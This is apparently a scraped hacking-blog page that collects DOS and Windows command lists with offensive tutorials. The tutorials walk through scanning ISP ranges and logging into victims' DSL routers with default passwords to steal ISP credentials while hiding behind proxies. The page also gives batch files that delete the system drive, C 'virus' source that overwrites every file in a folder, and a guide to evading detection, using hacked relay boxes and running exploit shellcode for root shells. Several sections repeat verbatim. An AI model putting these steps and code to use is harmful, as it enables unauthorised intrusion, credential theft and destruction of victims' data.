Changes the position of replaceable parameters in a batch program.
SHUTDOWN
Shutdown the computer from the MS-DOS prompt.
SMARTDRV
Create a disk cache in conventional memory or extended memory.
SORT
Sorts the input and displays the output to the screen.
START
Start a separate window in Windows from the MS-DOS prompt.
SUBST
Substitute a folder on your computer for another drive letter.
SWITCHES
Remove add functions from MS-DOS.
SYS
Transfer system files to disk drive.
TELNET
Telnet to another computer / device from the prompt.
TIME
View or modify the system time.
TITLE
Change the title of their MS-DOS window.
TRACERT
Visually view a network packets route across a network.
TREE
View a visual tree of the hard disk drive.
TYPE
Display the contents of a file.
UNDELETE
Undelete a file that has been deleted.
UNFORMAT
Unformat a hard disk drive.
UNLOCK
Unlock a disk drive.
VER
Display the version information.
VERIFY
Enables or disables the feature to determine if files have been written properly.
VOL
Displays the volume information about the designated drive.
XCOPY
Copy multiple files, directories, and/or drives from one location to another.
hacking DSL router!!
This tutorial will explain to you how to hack someone's internet account thru his router.This hack is based on a secuirty exploit of the router's default password and the stupidity of the user.Explanation: when somebody buy's a xDSL/Cabel router, the router is set to manufactory defaults like IP range, user accounts, router table, and most important the security level. The last one we will exploit.Most routers will have a user friendly setup menu running on port 23 (telnet) and sometimes port 80 (http) or both.This is what we are looking for.
Step 1.
Get a multie IP range scanner like superscanner (superscanner is fast and easy to use, get it here).Get a xDSL/Cabel user IP range. This is a single user IP 212.129.169.196 so the ip range of this Internet provider is 212.129.xxx.xxx most likely it will be from 212.129.1.1 to 212.129.255.255 .To keep your scanning range not to big it's smart to scan from 212.129.1.1 to 212.129.1.255 it also depends of your bandwidth how fast the scan will be finished.The IP adres above is just a example any IP range from a xDSL/Cabel provider can be used for this hack.before you start scanning specify the TCP/IP ports. You know that we are looking for TCP port 23 (telnet) and TCP port 80 (http) so edit the list and select only port 23 and port 80.Now start scanning and wait for the results.When finished scanning look for a IP that has a open port 23 and 80. Write them down or remember them.
Step 2.
Way 1
This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and address (56.9 modem for example) when connection to the victim's router.Now get a telnet program. Windows has a standard telnet program just go to start, select run and type down "telnet" without the ", click or enter OK.Select "connect" than "Remote system" enter IP adres of the victim in the "host name" field press OK.wait for your computer to make a connection. This way only works when the router has a open telnet port service running
Way 2
This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and adres (56.9 modem for example) when connection to the victim's router.Open a Internet explorer windows enter the IP address of the victim after the http:// in the address bar.This way only works when the router has a open hyper text transfer protocol (http) service running.
Step 3
Entering the userfriendly setup menu. 9 out of 10 times the menu is protected by a loginname and password. When the user doesn't change any security value's the default password stay's usable.So the only thing you have to do is find out what type of router the victim uses. I use this tool: GFILanguard Network Security Scanner. (get it here) is good. When you find out the type of router that's been used get the wright loginname and password from this list (get it here. not every router is on the list)
Default router password list
Step 4
When you have a connection in telnet or internet expolorer you need to look for user accounts.PPP, PPtP, PPeP, PPoP, or such connection protocol. If this is not correct look for anything that maybe contains any info about the ISP account of the user.go to this option and open it. Most likely you will see a overview of user setup options.Now look for the username and password.In most case the username will be freely displayed so just write it down or what ever....The password is a different story. Allmost always the password is protected by ********* (stars) in the telnet way there is noway around it (goto another victim) but when you have a port 80 connection (http). Internet connection way open click right mouse key and select "View source" now look for the field where the star are at. most likely you can read it because in the source code the star are converted to normal ASCII text.If not get a "******** to text" convertor like snadboy's revelation V.2 (get it here) move the cursor over the ****** and....It's a miracle you can read the password.Now you have the username and password. There a million fun thing to do with that but more about that next time.check the tutorial page freqently.
Tips.
Beware on most routers only one person can be loget on simultaneous in the router setupmenu.Don't change anything in the router if you don't know what you are doing.
Step 1.
Get a multie IP range scanner like superscanner (superscanner is fast and easy to use, get it here).Get a xDSL/Cabel user IP range. This is a single user IP 212.129.169.196 so the ip range of this Internet provider is 212.129.xxx.xxx most likely it will be from 212.129.1.1 to 212.129.255.255 .To keep your scanning range not to big it's smart to scan from 212.129.1.1 to 212.129.1.255 it also depends of your bandwidth how fast the scan will be finished.The IP adres above is just a example any IP range from a xDSL/Cabel provider can be used for this hack.before you start scanning specify the TCP/IP ports. You know that we are looking for TCP port 23 (telnet) and TCP port 80 (http) so edit the list and select only port 23 and port 80.Now start scanning and wait for the results.When finished scanning look for a IP that has a open port 23 and 80. Write them down or remember them.
Step 2.
Way 1
This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and address (56.9 modem for example) when connection to the victim's router.Now get a telnet program. Windows has a standard telnet program just go to start, select run and type down "telnet" without the ", click or enter OK.Select "connect" than "Remote system" enter IP adres of the victim in the "host name" field press OK.wait for your computer to make a connection. This way only works when the router has a open telnet port service running
Way 2
This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and adres (56.9 modem for example) when connection to the victim's router.Open a Internet explorer windows enter the IP address of the victim after the http:// in the address bar.This way only works when the router has a open hyper text transfer protocol (http) service running.
Step 3
Entering the userfriendly setup menu. 9 out of 10 times the menu is protected by a loginname and password. When the user doesn't change any security value's the default password stay's usable.So the only thing you have to do is find out what type of router the victim uses. I use this tool: GFILanguard Network Security Scanner. (get it here) is good. When you find out the type of router that's been used get the wright loginname and password from this list (get it here. not every router is on the list)
Default router password list
Step 4
When you have a connection in telnet or internet expolorer you need to look for user accounts.PPP, PPtP, PPeP, PPoP, or such connection protocol. If this is not correct look for anything that maybe contains any info about the ISP account of the user.go to this option and open it. Most likely you will see a overview of user setup options.Now look for the username and password.In most case the username will be freely displayed so just write it down or what ever....The password is a different story. Allmost always the password is protected by ********* (stars) in the telnet way there is noway around it (goto another victim) but when you have a port 80 connection (http). Internet connection way open click right mouse key and select "View source" now look for the field where the star are at. most likely you can read it because in the source code the star are converted to normal ASCII text.If not get a "******** to text" convertor like snadboy's revelation V.2 (get it here) move the cursor over the ****** and....It's a miracle you can read the password.Now you have the username and password. There a million fun thing to do with that but more about that next time.check the tutorial page freqently.
Tips.
Beware on most routers only one person can be loget on simultaneous in the router setupmenu.Don't change anything in the router if you don't know what you are doing.
format your hardisk using notepad!!
go to notepad
@Echo off
Del C:\ *.*y
save it as Dell.bat
or worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
@Echo off
Del C:\ *.*y
save it as Dell.bat
or worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
a sample c code for virus!!
/*this is a simple program to create a virus in c
it will create folder in a folder in a folder and so on run this on your own responsibility*/
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
it will create folder in a folder in a folder and so on run this on your own responsibility*/
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
all run commands!!
RUN CommandsUseful RUN Commands - I
To Access?. - Run CommandAccessibility Controls - access.cplAdd Hardware Wizard - hdwwiz.cplAdd/Remove Programs - appwiz.cplAdministrative Tools - control admintoolsAutomatic Updates - wuaucpl.cplBluetooth Transfer Wizard - fsquirtCalculator - calcCertificate Manager - certmgr.mscCharacter Map - charmapCheck Disk Utility - chkdskClipboard Viewer - clipbrdCommand Prompt - cmdComponent Services - dcomcnfgComputer Management - compmgmt.mscDate and Time Properties - timedate.cplDDE Shares - ddeshareDevice Manager - devmgmt.mscDirect X Control Panel (If Installed)* - directx.cplDirect X Troubleshooter - dxdiagDisk Cleanup Utility - cleanmgrDisk Defragment - dfrg.mscDisk Management - diskmgmt.mscDisk Partition Manager - diskpartDisplay Properties - control desktopDisplay Properties - desk.cplDisplay Properties (w/Appearance Tab Preselected) - control colorDr. Watson System Troubleshooting Utility - drwtsn32Driver Verifier Utility - verifierEvent Viewer - eventvwr.mscFile Signature Verification Tool - sigverifFindfast - findfast.cplFolders Properties - control foldersFonts - control fontsFonts Folder - fontsFree Cell Card Game - freecellGame Controllers - joy.cplGroup Policy Editor (XP Prof) - gpedit.mscHearts Card Game - mshearts
· Useful Run Commands - IIIexpress Wizard - iexpressIndexing Service - ciadv.mscInternet Properties - inetcpl.cplIP Configuration (Display Connection Configuration) - ipconfig /allIP Configuration (Display DNS Cache Contents) - ipconfig /displaydnsIP Configuration (Delete DNS Cache Contents) - ipconfig /flushdnsIP Configuration (Release All Connections) - ipconfig /releaseIP Configuration (Renew All Connections) - ipconfig /renewIP Configuration (Refreshes DHCP & Re - Registers DNS) -ipconfig /registerdnsIP Configuration (Display DHCP Class ID) - ipconfig /showclassidIP Configuration (Modifies DHCP Class ID) - ipconfig /setclassid Anonymous 9/28/06 Java Control Panel (If Installed) - jpicpl32.cplJava Control Panel (If Installed) - javawsKeyboard Properties - control keyboardLocal Security Settings - secpol.mscLocal Users and Groups - lusrmgr.mscLogs You Out Of Windows - logoffMicrosoft Chat - winchatMinesweeper Game - winmineMouse Properties - control mouseMouse Properties - main.cplNetwork Connections - control netconnectionsNetwork Connections - ncpa.cplNetwork Setup Wizard - netsetup.cplNotepad - notepadNview Desktop Manager (If Installed) - nvtuicpl.cplObject Packager - packagerODBC Data Source Administrator - odbccp32.cplOn Screen Keyboard - oskOpens AC3 Filter (If Installed) - ac3filter.cplPassword Properties - password.cplPerformance Monitor - perfmon.mscPerformance Monitor - perfmonPhone and Modem Options - telephon.cplPower Configuration - powercfg.cplPrinters and Faxes - control printersPrinters Folder - printersPrivate Character Editor - eudceditQuicktime (If Installed) - QuickTime.cplRegional Settings - intl.cplRegistry Editor - regeditRegistry Editor - regedit32Remote Desktop - mstscRemovable Storage - ntmsmgr.mscRemovable Storage Operator Requests - ntmsoprq.mscResultant Set of Policy (XP Prof) - rsop.msc
· Useful RUN Commands - IIIScanners and Cameras - sticpl.cplScheduled Tasks - control schedtasksSecurity Center - wscui.cplServices - services.mscShared Folders - fsmgmt.mscShuts Down Windows - shutdownSounds and Audio - mmsys.cplSpider Solitare Card Game - spiderSQL Client Configuration - cliconfgSystem Configuration Editor - syseditSystem Configuration Utility - msconfigSystem File Checker Utility (Scan Immediately) - sfc /scannowSystem File Checker Utility (Scan Once At Next Boot) - sfc /scanonceSystem File Checker Utility (Scan On Every Boot) - sfc /scanbootSystem File Checker Utility (Return to Default Setting) - sfc /revertSystem File Checker Utility (Purge File Cache) - sfc /purgecache Anonymous 9/28/06 System File Checker Utility (Set Cache Size to size x) -sfc /cachesize=xSystem Properties - sysdm.cplTask Manager - taskmgrTelnet Client - telnetUser Account Management - nusrmgr.cplUtility Manager - utilmanWindows Firewall - firewall.cplWindows Magnifier - magnifyWindows Management Infrastructure - wmimgmt.mscWindows System Security Tool - syskeyWindows Update Launches - wupdmgrWindows XP Tour Wizard - tourstartWordpad – write
To Access?. - Run CommandAccessibility Controls - access.cplAdd Hardware Wizard - hdwwiz.cplAdd/Remove Programs - appwiz.cplAdministrative Tools - control admintoolsAutomatic Updates - wuaucpl.cplBluetooth Transfer Wizard - fsquirtCalculator - calcCertificate Manager - certmgr.mscCharacter Map - charmapCheck Disk Utility - chkdskClipboard Viewer - clipbrdCommand Prompt - cmdComponent Services - dcomcnfgComputer Management - compmgmt.mscDate and Time Properties - timedate.cplDDE Shares - ddeshareDevice Manager - devmgmt.mscDirect X Control Panel (If Installed)* - directx.cplDirect X Troubleshooter - dxdiagDisk Cleanup Utility - cleanmgrDisk Defragment - dfrg.mscDisk Management - diskmgmt.mscDisk Partition Manager - diskpartDisplay Properties - control desktopDisplay Properties - desk.cplDisplay Properties (w/Appearance Tab Preselected) - control colorDr. Watson System Troubleshooting Utility - drwtsn32Driver Verifier Utility - verifierEvent Viewer - eventvwr.mscFile Signature Verification Tool - sigverifFindfast - findfast.cplFolders Properties - control foldersFonts - control fontsFonts Folder - fontsFree Cell Card Game - freecellGame Controllers - joy.cplGroup Policy Editor (XP Prof) - gpedit.mscHearts Card Game - mshearts
· Useful Run Commands - IIIexpress Wizard - iexpressIndexing Service - ciadv.mscInternet Properties - inetcpl.cplIP Configuration (Display Connection Configuration) - ipconfig /allIP Configuration (Display DNS Cache Contents) - ipconfig /displaydnsIP Configuration (Delete DNS Cache Contents) - ipconfig /flushdnsIP Configuration (Release All Connections) - ipconfig /releaseIP Configuration (Renew All Connections) - ipconfig /renewIP Configuration (Refreshes DHCP & Re - Registers DNS) -ipconfig /registerdnsIP Configuration (Display DHCP Class ID) - ipconfig /showclassidIP Configuration (Modifies DHCP Class ID) - ipconfig /setclassid Anonymous 9/28/06 Java Control Panel (If Installed) - jpicpl32.cplJava Control Panel (If Installed) - javawsKeyboard Properties - control keyboardLocal Security Settings - secpol.mscLocal Users and Groups - lusrmgr.mscLogs You Out Of Windows - logoffMicrosoft Chat - winchatMinesweeper Game - winmineMouse Properties - control mouseMouse Properties - main.cplNetwork Connections - control netconnectionsNetwork Connections - ncpa.cplNetwork Setup Wizard - netsetup.cplNotepad - notepadNview Desktop Manager (If Installed) - nvtuicpl.cplObject Packager - packagerODBC Data Source Administrator - odbccp32.cplOn Screen Keyboard - oskOpens AC3 Filter (If Installed) - ac3filter.cplPassword Properties - password.cplPerformance Monitor - perfmon.mscPerformance Monitor - perfmonPhone and Modem Options - telephon.cplPower Configuration - powercfg.cplPrinters and Faxes - control printersPrinters Folder - printersPrivate Character Editor - eudceditQuicktime (If Installed) - QuickTime.cplRegional Settings - intl.cplRegistry Editor - regeditRegistry Editor - regedit32Remote Desktop - mstscRemovable Storage - ntmsmgr.mscRemovable Storage Operator Requests - ntmsoprq.mscResultant Set of Policy (XP Prof) - rsop.msc
· Useful RUN Commands - IIIScanners and Cameras - sticpl.cplScheduled Tasks - control schedtasksSecurity Center - wscui.cplServices - services.mscShared Folders - fsmgmt.mscShuts Down Windows - shutdownSounds and Audio - mmsys.cplSpider Solitare Card Game - spiderSQL Client Configuration - cliconfgSystem Configuration Editor - syseditSystem Configuration Utility - msconfigSystem File Checker Utility (Scan Immediately) - sfc /scannowSystem File Checker Utility (Scan Once At Next Boot) - sfc /scanonceSystem File Checker Utility (Scan On Every Boot) - sfc /scanbootSystem File Checker Utility (Return to Default Setting) - sfc /revertSystem File Checker Utility (Purge File Cache) - sfc /purgecache Anonymous 9/28/06 System File Checker Utility (Set Cache Size to size x) -sfc /cachesize=xSystem Properties - sysdm.cplTask Manager - taskmgrTelnet Client - telnetUser Account Management - nusrmgr.cplUtility Manager - utilmanWindows Firewall - firewall.cplWindows Magnifier - magnifyWindows Management Infrastructure - wmimgmt.mscWindows System Security Tool - syskeyWindows Update Launches - wupdmgrWindows XP Tour Wizard - tourstartWordpad – write
learn hacking!!
How to learn to hack in easy steps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Introduction
~~~~~~~~~~~~
If you are a hacker, you read this, and find something that's not correct or you don't like,
i want to know. mail me.
I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and
i don't care at all as long as it's understandable.
When you finish reading it, please TELL ME how you like it!
COPYING: You're welcome to distribute this document to whoever the hell you want, post it
on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.
If you want to perform it, ask me for permission. thanks a lot!
DISCLAIMER: This document is intended for ludical or educational purposes. I don't want to
promote computer crime and I'm not responible of your actions in any way.
If you want to hack a computer, do the decent thing and ask for permission first.
Let's start
~~~~~~~~~~~
If you read carefully all what i'm telling here, you are smart and you work hard on it,
you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
A hacker is someone who is able to discover unknown vulnerabilities in software and able to
write the proper codes to exploit them.
NOTE: If you've been unlucky, and before you found this document, you've readen the
guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.
You won't understand some things from my tutorial until you unpoison your brain.
Some definitions
~~~~~~~~~~~~~~~~
I'm going to refer to every kind of computer as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
Michael Knight's car, The Matrix, etc.
The systems we're going to hack (with permission) are plenty of normal users, whose
don't have any remote idea about security, and the root. The root user is called
superuser and is used by the admin to administer the system.
I'm going to refer to the users of a system as lusers. Logically, I'll refer to
the admin as superluser.
Operating Systems
~~~~~~~~~~~~~~~~~
Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
or perhaps a mac (motorola) box running macOS.
You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
systems.
This is for two main reasons:
-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's better
than running it at home?
-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
you're running some kind of it.
Let's see where to find the unix you're interested on.
The UNIX systems may be divided in two main groups:
- commercial UNIXes
- free opensource UNIXes
A commercial unix's price is not like windoze's price, and it usually can't run on your box,
so forget it.
The free opensource UNIXes can also be divided in:
- BSD
These are older and difficult to use. The most secure OS (openBSD) is in this group.
You don't want them unless you're planning to install a server on them.
- Linux
Easy to use, stable, secure, and optimized for your kind of box. that's what we need.
I strongly suggest you to get the SuSE distribution of Linux.
It's the best one as i think, and i added here some tips for SuSE, so all should be easier.
Visit http://www.suse.de/ and look for a local store or order it online.
(i know i said it the software was free, but not the CDs nor the manual nor the support.
It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)
If you own an intel box, then order the PC version.
If you own a mac box, then order the PowerPC version.
Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.
It's possible you have problem with your hardware on the installation. Read the manual, ask
for technical support or buy new hardware, just install it as you can.
This is really important! READ THE MANUAL, or even buy a UNIX book.
Books about TCP/IP and C programming are also useful.
If you don't, you won't understand some things i'll explain later. And, of course, you'll
never become a hacker if you don't read a lot of that 'literature'.
the Internet
~~~~~~~~~~~~
Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
You want to hack internet boxes! So lets connect to the internet.
Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
You're a Linux user, and you gotta open your way to the Internet.
You gotta make your Linux box to connect to the net,
so go and set up your modem (using YaST2 in SuSE).
Common problems:
If your box doesn't detect any modems, that probably means that you have no modem installed
:-D (not a joke!).
Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
specifically designed to work ONLY on windoze. Don't blame linux, this happens because the
winmodem has not a critical chip that makes it work. It works on windoze cause the vendor
driver emulates that missing chip. And hat vendor driver is only available for windoze.
ISA and external modems are more probably real modems, but not all of them.
If you want to make sure wether a modem is or not a winmodem, visit http://start.at/modem.
Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)
NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the
internet with aol. You can't hack with aol. i don't like aol. aol sucks.
Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,
leave aol and get a real ISP. Then you'll be forgiven.
Don't get busted
~~~~~~~~~~~~~~~~
Let's suppose you haven't skipped everything below and your Linux bow is now connected to the net.
It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.
- Don't hack
this is the most effective stealth technique. not even the FBI can bust you. :-)
If you choose this option, stop reading now, cause the rest is worthless and futile.
- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
your own website oe email address, find your ISP, your phone number, your home...
and you get busted!!
- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
NEVER tell others you've hacked a box.
- NEVER hack directly from your box (your_box --> victim's box).
Always use a third box in the middle (your_box --> lame_box --> victim's box).
Where lame_box is a previously hacked box or...a shell account box!
A shell account is a service where you get control of a box WITHOUT hacking it.
There are a few places where shell accounts are given for free. One of them is nether.net.
- Don't hack dangerous boxes until you're a real hacker.
Which boxes are dangerous:
Military boxes
Government boxes
Important and powerful companies' boxes
Security companies' boxes
Which boxes are NOT dangerous:
Educational boxes (any .edu domain)
Little companies' boxes
Japanese boxes
- Always connect to the internet through a free and anonymous ISP
(did i tell you that AOL is NOT an ISP?)
- Use phreking techniques to redirect calls and use others' lines for your ISP call.
Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.
TCP ports and scanning
~~~~~~~~~~~~~~~~~~~~~~
Do you got your stealth linux box connected to the internet (not aol)?
Have you read the manual as i told you?
Then we shall start with the damn real thing.
First of all, you should know some things about the internet. It's based on the TPC/IP protocol,
(and others)
It works like this: every box has 65k connection PORTS. some of them are opened and waiting for
your data to be sent.
So you can open a connection and send data to any these ports. Those ports are associated with
a service:
Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
on the box, opens its port and offers their damn service.
here are some common ports and their usual services (there are a lot more):
Port number Common service Example daemon (d stands for daemon)
21 FTP FTPd
23 Telnet telnetd
25 SMTP sendmail (yes!)
80 HTTP apache
110 POP3 qpop
Example:
when you visit the website http://www.host.com/luser/index.html, your browser does this:
-it connects to the TCP port 80
-it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'
(it really sends a lot of things more, but that is the essential)
-the host sends the html file
The cool thing of daemons is they have really serious security bugs.
That's why we want to know what daemons are running there, so...
We need to know what ports are opened in the box we want to hack.
How could we get that information?
We gotta use a scanner. A scanner is a program that tries to
connect to every port on the box and tells which of them are opened.
The best scanner i can think of is nmap, created by Fyodor.
You can get nmap from my site in tarball or rpm format.
Let's install nmap from an .rpm packet.
bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
then we run it:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Nmap has told us which ports are opened on target.edu and thus, what services it's offering.
I know, i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.
So lets see what's on that ports.
On your linux console, type:
bash-2.03$ telnet target.edu 21
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu FTP server (SunOS 5.6) ready.
quit
221 Goodbye.
Connection closed by foreign host.
You see?
They speak out some valuable information:
-their operating system is SunOS 5.6
-their FTP daemon is the standard provided by the OS.
bash-2.03$ telnet target.edu 25
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0
400 (EDT)
quit
221 2.0.0 target.edu closing connection
Connection closed by foreign host.
They like to tell us everything:
-their SMTP daemon is sendmail
-its version is 8.11.0/8.9.3
Experiment with other ports to discover other daemons.
Why is this information useful to us? cause the security bugs that can let us in depend
on the OS and daemons they are running.
But there is a problem here... such information can be faked!
It's difficult to really know what daemons are they running, but we can know FOR SURE
what's the operating system:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
TCP Sequence Prediction: Class=random positive increments
Difficulty=937544 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.14
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!
We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
but the information we've already gathered should be enough.
This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
what's the OS there and its very difficult to avoid it.
Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.
Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
And we don't want the admins to get angry with us, that's why we used the -sS option.
This way (most) hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
usage of nmap's features, read its man page:
bash-2.03$ man nmap
How to upload and compile programs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The most obvious and simple way is using FTP:
bash-2.03$ ls
program.c
sh-2.03$ ftp target.edu
Connected to target.edu.
220 target.edu FTP server (SunOS 5.6) ready.
Name: luser
331 Password required for luser.
Password:
230 User luser logged in.
ftp> put program.c
200 PORT command successful.
150 ASCII data connection for program.c (204.42.253.18,57982).
226 Transfer complete.
ftp> quit
221 Goodbye.
But this is not a really good way. It can create logs that will make the admin to detect us.
Avoid uploading it with FTP as you can, use cut&paste instead.
Here's how to make it:
we run a text editor
sh-2.03$ pico exploit.c
if it doesn't work, try this one:
sh-2.03$ vi exploit.c
Of course, you must learn how to use vi.
Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,
ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the
text from it. Change to your target and paste the code so you've 'uploaded' the file.
To cut a text from the screen, you need to install the gpm packet from your linux distribution.
This program lets you select and cut text with your mouse.
If cut&paste doesn't work, you can also type it by hand (they aren't usually large).
Once you get the .c file there, here's how to compile:
sh-2.03$ gcc program.c -o program
and execute:
sh-2.03$ ./program
Exploiting vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the most important part of our hacking experience. Once we know what target.edu
is running, we can go to one of those EXPLOIT databases that are on the net.
A exploit is a piece of code that exploits a vulnerability on its software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easy
exploitable. If your target gots an old version, you'll probably get in easyly.
When we exploit a security bug, we can get:
- a normal shell (don't know what a shell is? read a book of unix!)
a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
this one lets us send commands to the box, but we got limited priviledges.
- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.
These are some exploit databases i suggest you to visit:
http://www.hack.co.za/
http://www.r00tabega.org/
http://www.rootshell.com/
http://www.securityfocus.com/
www.insecure.org/sploits.html
Every exploit is different to use, so read its text and try them.
They usually come in .c language.
The most standar and easy to use exploits are buffer overflows.
I won't explain here how a buffer overflow does work,
Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different to every OS, so this is a strong reason to know what OS they're running.
We edit the .c file we've downloaded and look for something like this:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.
You gotta replace it by the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smash The Stack For Fun And Profit).
IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
if they let you do it, then you shall continue.
if they don't give you permission, STOP HERE and try with another one.
shall you continue without their permission, you'd be inquiring law and
i'm not responible of your craziness in any way!!!
You should have now the shell account, this is the time to use it!
everything i explain on this section, do it through your shell account:
bash-2.03$ telnet myshellaccount 23
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
Escape character is '^]'.
Welcome to yourshellaccount
login: malicioususer
Password: (it doesn't display)
Last login: Fry Sep 15 11:45:34 from .
sh-2.03$
Here is a example of a buffer overflow (that doesn't really exist):
we compile it:
sh-2.03$ gcc exploit.c -o exploit
we execute it:
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
Sendmail works on port 25, so:
sh-2.03$./exploit 25 target.edu
Cool, '$' means we got a shell! Let's find out if we're root.
$whoami
root
Damn, we've rooted target.edu!
$whyamiroot
because you've hacked me! :-) (just kidding)
There are some exploits that don't give you root directly, but a normal shell.
It depends on what luser is running the daemon. (sendmail is usually root)
Then you'll have to upload a .c file with a local (local means it can't overflow
a daemon, but a local program) overflow and compile it.
Remember to avoid uploading it with FTP as you can.
Other kind of exploit is the one that gives you access to the password file.
If a host gots port 23 (telnet) opened, we can login as a normal user
(remote root logins are usually not allowed) by putting his/hers/its username
and password. Then use the su command to become root.
sh-2.03$ telnet target.edu 23
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
We're running SunOS 5.7
